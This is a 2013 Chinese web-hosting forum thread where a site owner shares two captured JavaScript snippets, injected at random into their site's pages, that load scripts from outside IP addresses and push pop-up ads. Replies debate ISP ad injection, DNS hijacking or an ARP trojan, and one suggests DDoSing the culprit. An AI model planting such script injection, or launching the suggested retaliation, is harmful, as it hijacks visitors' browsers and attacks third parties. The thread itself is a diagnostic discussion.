全球主机交流论坛

标题: 遇到一个怪问题网站的js被随机篡改加入了弹窗，求解？ [打印本页]

作者: 寂寞的公安 时间: 2013-4-15 12:28
标题: 遇到一个怪问题网站的js被随机篡改加入了弹窗，求解？
一个小站，本身未加弹窗，结果打开时弹出一个弹窗，然后刷新没有了，过段时间再打开又有弹窗，查看源代码，发现里面的js被篡改。但是上服务器上打开js查看又是正常的。基本排除网站程序的问题，网上搜索的结果一般认为是电信强加广告，但是我访问其他站一次也没出现过，独访问这个站才有弹窗。也有认为是arp攻击。求大神解答，这问题搞得好头疼。附js代码如下：

var _objparam_51_ = new Object;
_objparam_51_.p = 1365966787;
_objparam_51_.aid = 49;
_objparam_51_.stat = 'http://76.73.85.179/stat/img.php?p='+_objparam_51_.p+'&aid='+_objparam_51_.aid+'&acid=1&area=440600&uid=31633&ucid=73';
_objparam_51_.otherstat = 'http://76.73.85.179/stat/otherstat.php?type=2&aid='+_objparam_51_.aid;
_objparam_51_.expires = 10;
_objparam_51_.oldurl = 'http://小站域名.com/js/bot2.js?p=1';
_objparam_51_.url = 'http://www.lftyx.com/a195338.php?W2Ce78=2&p=1365966787&c=1900483101';
window.setTimeout(function(){var a=document.createElement("script");a.src=_objparam_51_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
window.setTimeout(function(){var a=document.createElement("script");a.src="http://76.73.85.179/js/utils51.js";document.getElementsByTagName("head")[0].appendChild(a);},0);
<!--

还有一个

var _objparam_51_ = new Object;
_objparam_51_.p = 1365972238;
_objparam_51_.aid = 45;
_objparam_51_.stat = 'http://67.159.44.187/stat/img.php?p='+_objparam_51_.p+'&aid='+_objparam_51_.aid+'&acid=1&area=440600&uid=31633&ucid=73';
_objparam_51_.otherstat = 'http://67.159.44.187/stat/otherstat.php?type=2&aid='+_objparam_51_.aid;
_objparam_51_.expires = 10;
_objparam_51_.oldurl = 'http://小站域名.com/js/xp.js?p=1';
_objparam_51_.url = 'http://www.51zhenxin.info/a195338.php?W2Ce78=1&p=1365972238&c=1900483101';
window.setTimeout(function(){var a=document.createElement("script");a.src=_objparam_51_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
window.setTimeout(function(){var a=document.createElement("script");a.src="http://67.159.44.187/js/utils51.js";document.getElementsByTagName("head")[0].appendChild(a);},0);
<!--

小站域名，我就省略了。
不知是否有朋友遇到过？盼解答，为谢。

作者: 寂寞的公安 时间: 2013-4-15 15:07
技术大牛呢

作者: 匿名用户 时间: 2013-4-15 22:38
电信推送广告

作者: vagaa 时间: 2013-4-15 22:42
往死里DDCC他

作者: 寂寞的公安 时间: 2013-4-15 23:01

vagaa 发表于 2013-4-15 22:42
往死里DDCC他

我没那技术，等大牛来ddcc.

作者: 寂寞的公安 时间: 2013-4-15 23:02

匿名用户发表于 2013-4-15 22:38
电信推送广告

比较大可能

作者: shshwzs 时间: 2013-4-15 23:09
刚刚下单电信12m。。。

作者: 154375446 时间: 2013-4-15 23:18
电信，强加的

作者: hanhan7979 时间: 2013-4-16 02:53
楼主是广东地区的吗？这个就是电信植入的弹窗广告，弹的都是网页那个SB 91玩的网页游戏广告，我的小站也弹半小时一次。

作者: hanhan7979 时间: 2013-4-16 02:55
yunwei.org/可以看看这个兄弟也是被弹的

作者: 每次醒来 时间: 2013-4-16 02:56
打电话叫电信的禁止广告就行了

作者: 寂寞的公安 时间: 2013-4-16 13:58

hanhan7979 发表于 2013-4-16 02:53
楼主是广东地区的吗？这个就是电信植入的弹窗广告，弹的都是网页那个SB 91玩的网页游戏广告，我的小站也弹 ...

确实如此。还以为网站被挂马了。这群贱人真是害人。

作者: wix 时间: 2013-5-3 21:27

寂寞的公安发表于 2013-4-16 13:58
确实如此。还以为网站被挂马了。这群贱人真是害人。

你这个问题解决了吗.最近我也遇到这样的问题.弹的都是黄色内容

作者: Tou 时间: 2013-5-4 00:19
DNS污染

作者: kermit 时间: 2013-5-4 00:32
早上新闻了吧

作者: Tou 时间: 2013-5-4 01:35
修改DNS 为8.8.8.8 和8.8.4.4 或者国内的114.114.114.114

作者: ybs885 时间: 2013-5-4 02:00
楼主。。。。。你被人注入网页木马了。都加密的。要仔细找才知道。。。我被注入快半年。后来那个站就被K了。。。悲剧

作者: 寂寞的公安 时间: 2013-5-4 11:02

ybs885 发表于 2013-5-4 02:00
楼主。。。。。你被人注入网页木马了。都加密的。要仔细找才知道。。。我被注入快半年。后来那个站就被K了 ...

很郁闷，我的好几个站都有，我想你说的好像是对的。

作者: mslxd 时间: 2013-5-4 11:08
你试试别的地区访问网站看看

别的地区没有的话，就是强加的

作者: 寂寞的公安 时间: 2013-5-4 11:11

mslxd 发表于 2013-5-4 11:08
你试试别的地区访问网站看看

别的地区没有的话，就是强加的

别的地区是没有，他这个广告好像是随机出现的。但是我现在只在我的站上看到，别人的站上一次也没出现过，所以有点怀疑机器被挂马了。

作者: 寂寞的公安 时间: 2013-5-4 11:14

wix 发表于 2013-5-3 21:27
你这个问题解决了吗.最近我也遇到这样的问题.弹的都是黄色内容

还没解决，不能确定原因。

作者: 寂寞的公安 时间: 2013-5-4 11:20

Tou 发表于 2013-5-4 01:35
修改DNS 为8.8.8.8 和8.8.4.4 或者国内的114.114.114.114

DNS 为8.8.8.8，问题依旧。

作者: Tou 时间: 2013-5-4 14:07

寂寞的公安发表于 2013-5-4 11:20
DNS 为8.8.8.8，问题依旧。

设置8.8.8.8 之后刷新dns缓存，win电脑 cmd 输入ipconfig /flushdns

作者: 深圳湾 时间: 2013-5-4 16:07
路由，把广东电信官方网站全封了，还有几个做DNS劫持的IP段都封掉。。干净了。

作者: doors 时间: 2013-5-4 16:19
你这个是中ARP木马了吧？

作者: 寂寞的公安 时间: 2013-5-4 18:04

doors 发表于 2013-5-4 16:19
你这个是中ARP木马了吧？

不是太清楚。头疼。

作者: 小朴 时间: 2013-5-4 18:23
Arp...

欢迎光临全球主机交流论坛 (https://fd.vvwvv.eu.org/)